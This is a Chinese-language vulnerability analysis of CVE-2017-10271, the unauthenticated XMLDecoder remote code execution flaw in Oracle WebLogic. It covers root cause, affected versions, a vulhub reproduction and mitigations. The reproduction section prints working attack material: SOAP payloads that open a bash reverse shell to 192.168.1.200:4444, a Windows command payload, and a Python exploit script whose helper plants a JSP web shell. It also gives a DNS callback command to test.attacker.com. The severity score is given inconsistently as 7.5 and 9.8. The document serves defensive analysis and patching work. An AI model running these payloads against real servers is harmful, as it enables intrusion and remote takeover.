一、漏洞简介¶
1.1 漏洞背景¶
2017年10月,Oracle发布了包含CVE-2017-10271修复的季度关键补丁更新。该漏洞是WebLogic Server WLS Security组件中的远程代码执行漏洞,通过T3协议和HTTP协议均可触发,漏洞利用简单且无需认证。
该漏洞是CVE-2015-4852的绕过补丁,攻击者利用WebLogic内置的XMLDecoder组件进行反序列化攻击,绕过了Oracle之前的反序列化防护措施。
1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)¶
| 项目 | 内容 |
|---|---|
| 漏洞编号 | CVE-2017-10271 |
| 危害等级 | HIGH / 7.5 |
| 漏洞类型 | XMLDecoder 反序列化远程代码执行漏洞 |
| 披露时间 | 2017-10-19 |
| 影响组件 | Oracle WebLogic Server 重大 |
- CVE编号:CVE-2017-10271
- 危害等级:严重(Critical)
- CVSS评分:9.8(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- 漏洞类型:XMLDecoder反序列化远程代码执行
- 攻击复杂度:低
- 权限要求:无需认证
- 用户交互:无需用户交互
补充核验信息:公开时间:2017-10-19;NVD 评分:7.5(HIGH);CWE:CWE-306。
二、影响范围¶
2.1 受影响的版本¶
- Oracle WebLogic Server 10.3.6.0
- Oracle WebLogic Server 12.1.3.0
- Oracle WebLogic Server 12.2.1.1
- Oracle WebLogic Server 12.2.1.2
2.2 不受影响的版本¶
- Oracle WebLogic Server 10.3.6.0 + 2017年10月CPU补丁及以上
- Oracle WebLogic Server 12.1.3.0 + 2017年10月CPU补丁及以上
- Oracle WebLogic Server 12.2.1.3 及以上版本
2.3 触发条件(如特定模块、特定配置、特定运行环境等)¶
- 目标WebLogic Server开放HTTP服务端口(默认7001)
- 目标WebLogic启用了WLS Web Services组件
- 攻击者能够发送HTTP请求到目标服务器
三、漏洞详情与原理解析¶
3.1 漏洞触发机制¶
WebLogic Server的WLS Security组件使用Java内置的XMLDecoder类来解析SOAP消息中的XML数据。XMLDecoder可以将XML数据反序列化为Java对象,但该类设计上就允许执行任意代码。
攻击路径:
HTTP请求 → /wls-wsat/CoordinatorPortType → SOAP消息解析
→ XMLDecoder.readObject() → 执行XML中的任意Java代码
3.2 源码层面的根因分析(结合源码与补丁对比)¶
漏洞入口:wls-wsat组件的SOAP处理
// weblogic.wsee.jaxws.persistence.PersistentContext
public class PersistentContext {
public void readXML(InputStream is) {
XMLDecoder decoder = new XMLDecoder(is); // 危险!
Object obj = decoder.readObject(); // 反序列化执行
decoder.close();
}
}
XMLDecoder危险特性:
// XMLDecoder 可以执行任意Java代码
// 例如以下XML会在readObject时执行calc.exe:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_80" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime">
<method name="getRuntime">
<method name="exec">
<string>calc.exe</string>
</method>
</method>
</object>
</java>
WebLogic处理流程:
// weblogic.wsee.jaxws.WorkContextServerHandler
public boolean handleMessage(MessageContext ctx) {
SOAPMessageContext smc = (SOAPMessageContext)ctx;
SOAPMessage msg = smc.getMessage();
// 获取SOAP Header
SOAPHeader header = msg.getSOAPHeader();
// 解析WorkContext
Iterator it = header.getChildElements();
while (it.hasNext()) {
SOAPElement el = (SOAPElement)it.next();
if ("WorkContext".equals(el.getLocalName())) {
// 使用XMLDecoder解析 - 漏洞点!
XMLDecoder decoder = new XMLDecoder(
new ByteArrayInputStream(el.getValue().getBytes())
);
decoder.readObject(); // 执行恶意代码
}
}
return true;
}
触发端点列表:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
四、漏洞复现(可选)¶
4.1 环境搭建¶
Docker环境(推荐):
# 使用vulhub环境
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
# 启动环境
docker-compose up -d
# 检查服务
docker-compose ps
curl -I http://localhost:7001/console
手动环境:
# 下载WebLogic 12.2.1.2
wget [Oracle官方下载链接]
# 安装并创建域
java -jar fmw_12.2.1.2.0_wls.jar -silent -responseFile response_file.txt
# 启动服务器
cd /root/Oracle/Middleware/user_projects/domains/base_domain
./startWebLogic.sh
4.2 PoC 演示与测试过程¶
HTTP请求PoC(反弹shell):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.100:7001
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64)
Connection: close
Content-Type: text/xml
Content-Length: 750
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.1.200/4444 0>&1</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Python自动化PoC:
#!/usr/bin/env python3
# CVE-2017-10271 WebLogic XMLDecoder RCE PoC
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(target, command):
"""
发送恶意SOAP请求执行命令
"""
url = f"{target}/wls-wsat/CoordinatorPortType"
payload = f'''<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/ResponseService">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{command}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>'''
headers = {
"Content-Type": "text/xml",
"User-Agent": "Mozilla/5.0"
}
try:
response = requests.post(url, data=payload, headers=headers,
verify=False, timeout=10)
print(f"[*] Status: {response.status_code}")
print(f"[*] Response: {response.text[:500]}")
if response.status_code == 500:
print("[+] Payload likely executed!")
return True
except Exception as e:
print(f"[-] Error: {e}")
return False
def write_webshell(target, shell_path):
"""
写入WebShell到目标服务器
"""
shell_content = """<%
if("password".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
while((a=in.read(b))!=-1){
out.println(new String(b));
}
}
%>"""
command = f"echo '{shell_content}' > {shell_path}"
return exploit(target, command)
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: python3 exploit.py <target_url> <command>")
print("Example: python3 exploit.py http://192.168.1.100:7001 'id'")
sys.exit(1)
target = sys.argv[1]
command = sys.argv[2]
print(f"[*] Target: {target}")
print(f"[*] Command: {command}")
exploit(target, command)
Windows版本PoC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.100:7001
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>whoami > C:\\temp\\pwned.txt</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
验证漏洞存在:
# 发送DNS外带测试
python3 exploit.py http://192.168.1.100:7001 "nslookup test.attacker.com"
# 监听反弹shell
nc -lvnp 4444
# 发送反弹shell payload
python3 exploit.py http://192.168.1.100:7001 "bash -i >& /dev/tcp/192.168.1.200/4444 0>&1"
五、修复建议与缓解措施¶
5.1 官方版本升级建议¶
- 立即应用Oracle CPU补丁:
-
2017年10月关键补丁更新(CPU)
-
升级到安全版本:
-
WebLogic Server 12.2.1.3 或更高版本
-
官方补丁下载:
https://support.oracle.com/rs?type=patch&id=26919434
5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)¶
方案一:删除wls-wsat组件(最有效)
cd /root/Oracle/Middleware/wlserver/server/lib
rm -rf wls-wsat.war
cd /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal
rm -rf wls-wsat
# 重启WebLogic
./stopWebLogic.sh && ./startWebLogic.sh
方案二:限制访问路径
# Nginx反向代理配置
location ~* ^/wls-wsat/ {
deny all;
return 403;
}
# 或使用WebLogic连接过滤器
# config.xml添加:
<ConnectionFilter>
<ConnectionFilterRule>
<TargetAddress>*</TargetAddress>
<TargetUri>/wls-wsat/*</TargetUri>
<Action>DENY</Action>
</ConnectionFilterRule>
</ConnectionFilter>
方案三:启用访问控制
<!-- web.xml 添加安全约束 -->
<security-constraint>
<web-resource-collection>
<web-resource-name>WLS-WSAT</web-resource-name>
<url-pattern>/wls-wsat/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>Admin</role-name>
</auth-constraint>
</security-constraint>
六、参考信息 / 参考链接¶
6.1 官方安全通告¶
- Oracle Critical Patch Update October 2017: https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
- NVD CVE-2017-10271: https://nvd.nist.gov/vuln/detail/CVE-2017-10271
6.2 其他技术参考资料¶
- CVE-2017-10271 分析: https://www.exploit-db.com/exploits/43458/
- WebLogic XMLDecoder漏洞详解: https://www.freebuf.com/vuls/148794.html
- Oracle WebLogic补丁绕过分析: https://paper.seebug.org/398/